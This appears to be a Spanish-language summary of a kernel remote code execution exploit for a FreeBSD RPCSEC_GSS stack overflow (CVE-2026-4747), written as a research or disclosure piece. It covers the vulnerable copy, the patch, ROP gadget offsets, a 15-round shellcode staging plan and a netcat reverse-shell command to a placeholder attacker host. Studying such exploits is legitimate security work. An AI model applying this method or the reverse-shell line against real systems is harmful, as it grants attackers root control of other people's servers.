Obtención de shell root mediante RCE remota del kernel en FreeBSD (CVE-2026-4747)

• En el módulo kgssapi.ko de FreeBSD se produce un desbordamiento de búfer en la pila durante el procesamiento de autenticación RPCSEC_GSS, lo que permite ejecución remota de código
• La función svc_rpc_gss_validate() copia datos de credenciales sin verificación de límites, sobrescribiendo incluso la dirección de retorno
• Un atacante puede inyectar una cadena ROP del kernel a través de la ruta RPCSEC_GSS del servidor NFS usando un ticket Kerberos válido
• Mediante un desbordamiento en 15 etapas, escribe 432 bytes de shellcode en el área BSS del kernel y luego los ejecuta, creando una reverse shell con privilegios root
• Se ven afectadas algunas versiones de FreeBSD 13.5~15.0, y el parche agrega la lógica de validación de oa_length

CVE-2026-4747 — Desbordamiento de búfer en la pila de RPCSEC_GSS en kgssapi.ko de FreeBSD

• Vulnerabilidad de desbordamiento de búfer en la pila que ocurre durante el procesamiento de autenticación RPCSEC_GSS en el módulo kgssapi.ko de FreeBSD
• La función svc_rpc_gss_validate() copia datos de credenciales al reconstruir el encabezado RPC en un búfer de pila de 128 bytes sin verificar límites sobre oa_length
• Las credenciales que exceden los 96 bytes restantes después del encabezado fijo de 32 bytes sobrescriben variables locales, registros guardados e incluso la dirección de retorno
• Están afectadas las versiones FreeBSD 13.5(<p11), 14.3(<p10), 14.4(<p1), 15.0(<p5)
• El parche agrega una condición para verificar antes de copiar si oa_length excede el tamaño del búfer

Estructura del desbordamiento e impacto

• El análisis del prólogo de la función muestra que el arreglo rpchdr está ubicado en [rbp-0xc0] y el punto de inicio de la copia en [rbp-0xa0]
• A partir de los 96 bytes se sobrescriben, en orden, RBX guardado, R12~R15, RBP y la dirección de retorno
• En el ataque real, debido al encabezado GSS y al handle de contexto de 16 bytes, la dirección de retorno queda en el byte 200 del cuerpo de credenciales
• El código vulnerable solo es alcanzable desde la ruta de autenticación RPCSEC_GSS del servidor NFS
• El atacante debe ser un usuario con un ticket Kerberos válido y provocar el desbordamiento en la etapa de autenticación RPCSEC_GSS (procedimiento DATA)

Configuración del entorno de ataque

• VM objetivo: FreeBSD 14.4-RELEASE amd64, servidor NFS habilitado, kgssapi.ko cargado, KDC de MIT Kerberos en ejecución
• Host atacante: Linux, módulo Python3 gssapi y cliente MIT Kerberos instalados, con acceso a NFS (2049/TCP) y KDC (88/TCP)
• Puede configurarse en diversos hipervisores como QEMU, VMware, VirtualBox y bhyve
• En la configuración de Kerberos son obligatorios rdns=false y dns_canonicalize_hostname=false en krb5.conf
• Deben coincidir entre la VM y el atacante el nombre de host (test) y el service principal (nfs/test@TEST.LOCAL)

Estructura del exploit de ejecución remota de código del kernel (RCE)

• El ataque consta de 15 rondas de desbordamiento multietapa
  1. En cada ronda se crea un nuevo contexto Kerberos GSS
  2. Se envía un paquete RPCSEC_GSS DATA de tamaño excesivo
  3. Se sobrescribe la dirección de retorno con un gadget ROP para escribir datos en memoria del kernel o ejecutar shellcode
  4. Se llama a kthread_exit() para terminar normalmente el hilo NFS
• Cada ronda usa una cadena ROP de unos 200 bytes y los 432 bytes totales de shellcode se envían a lo largo de 15 rondas
• Como FreeBSD crea 8 hilos NFS por CPU, se requieren al menos 2 CPU (16 hilos)

Construcción de la cadena ROP

• Gadgets ROP principales:
  • pop rdi; ret (K+0x1adcda)
  • pop rsi; ret (K+0x1cdf98)
  • pop rdx; ret (K+0x5fa429)
  • pop rax; ret (K+0x400cb4)
  • mov [rdi], rax; ret (0xffffffff80e3457c) — escritura arbitraria de 8 bytes en memoria del kernel
• Ronda 1: llamada a pmap_change_prot() para cambiar el área BSS del kernel a RWX
• Rondas 2–14: uso del gadget mov [rdi], rax para escribir el shellcode en la BSS en bloques de 32 bytes
• Ronda 15: escritura de los últimos 16 bytes y salto al punto de entrada del shellcode

Funcionamiento del shellcode

• Se ejecuta en modo kernel (CPL 0) y crea un proceso de reverse shell con privilegios root
• Como no es posible invocar execve() directamente desde el hilo del kernel de NFS, se usa una estructura de dos etapas
  • Función Entry: crea un nuevo proceso del kernel con kproc_create() y luego termina
  • Función Worker: ejecuta /bin/sh -c "mkfifo /tmp/f;sh</tmp/f|nc ATTACKER 4444>/tmp/f"
• Inicializa el registro DR7 para evitar excepciones de depuración
• Limpia la bandera P_KPROC para que fork_exit() siga la ruta userret en vez de kthread_exit()
• Como resultado, /bin/sh se ejecuta en modo usuario con privilegios uid 0(root)

Proceso de resolución de problemas principales

• Desajuste en offsets de registros: se confirmó con un patrón De Bruijn que el offset real de RIP era de 200 bytes
• Incompatibilidad GSS MIT–Heimdal: el problema de normalización del nombre de host se resolvió con la configuración de krb5.conf
• Herencia de registros de depuración: se evitó la excepción trap 1 inicializando DR7
• Límite de 400 bytes: se logró una transmisión estable en unidades de 8 bytes con la combinación pop rdi + pop rax + mov [rdi], rax
• Consumo de hilos NFS: en cada ronda termina 1 hilo, por lo que se requieren al menos 2 CPU

Resumen del flujo final del exploit

• El atacante obtiene un ticket Kerberos y luego envía secuencialmente 15 paquetes de desbordamiento RPCSEC_GSS
• Ronda 1: establecer la BSS como RWX
• Rondas 2–14: escribir 416 bytes de shellcode
• Ronda 15: escribir los últimos 16 bytes y ejecutar el shellcode
• El shellcode crea un nuevo proceso con kproc_create() y ejecuta /bin/sh
• El atacante obtiene una shell root desde la sesión nc
• Todo el proceso toma alrededor de 45 segundos y se completa con un total de 15 paquetes RPC